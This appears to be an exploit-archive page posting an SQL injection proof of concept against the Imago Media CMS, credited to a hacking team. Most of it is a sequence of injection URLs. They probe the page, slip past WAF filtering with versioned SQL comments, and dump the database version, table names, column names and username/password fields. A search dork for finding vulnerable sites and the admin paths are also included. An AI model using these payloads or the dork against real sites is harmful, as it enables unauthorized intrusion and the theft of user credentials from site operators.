Home / os / win10

IMAGO MEDIA CMS SQL INJECTION

Posted on 30 November -0001

<HTML><HEAD><TITLE>IMAGO MEDIA CMS SQL INJECTION</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>                                                          

                                                        + IMAGO MEDIA CMS SQL INJECTION +
                                                           -------------------------------------------

// Author      : Zbyte
// Team        : K33P-S1L3NT 
// Notif         : Ternate Lab Pentesting
// page         : https://www.facebook.com/loading.gov 
// channel     : https://www.youtube.com/channel/UChFMZ01R8Z1mhh2tWc-BddQ 
// Grets        : QueenAisyah | geek_Defcon | kazutto_kun | s1puT | Badaki | 1!0N7!N | i.am_geek | Admiral | Kopral 
// CMS         : http://imagomedia.co.id/
// DORK       : inurl:/hal-visi-misi ext:html
// Admin page : site.com/user/index.php  or  site.com/admin/

// Special     : Overload Team | Cyber Team Cirebon | Mr.Trouble5hooting
// Demo       : http://imagomedia.co.id/notif.php


Follow for Proof of Concept Description Bypass WAF
 ( https://ghostbin.com/paste/tx2rg ) 


Proof of Concept
--------------------

site.com/hal-visi-misi.html <= default

site.com/hal-visi-misi'.html  

site.com/hal-visi-misi' order by 10+--+.html 
 
site.com/hal-visi-misi' union+select+1,2,3,4,5,6,7,8,9,10+--+.html 

site.com/hal-visi-misi' /*!union*/+/*!select*/+1,2,3,4,5,6,7,8,9,10+--+.html 

site.com/hal-visi-misi' /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,9,10+--+.html 

site.com/hal-visi-misi' and false /*!12345union*/+/*12345select*/+1,2,3,4,5,6,7,8,9,10+--+.html 
 
site.com/hal-visi-misi' and false /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,9,10+--+.html <= 

site.com/hal-visi-misi' and false /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,version(),10+--+.html 

site.com/hal-visi-misi' and false /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,database(),10+--+.html

site.com/hal-visi-misi' and false /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,group_concat(/*!table_name*/),10+from+information_schema./*!tables*/ where /*!table_schema*/=database()+--+.html

site.com/hal-visi-misi' union+select+1,2,3,4,5,6,7,8,group_concat(/*!column_name*/),10+from information_schema./*!columns*/ where /*!table_name*/=0x7461626c656d616e6573+--+.html

site.com/hal-visi-misi' union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3a,pswd,0x3a,status),10+from+tablemanes+--+.html
</BODY></HTML>

 

TOP

Malware :

Exploits :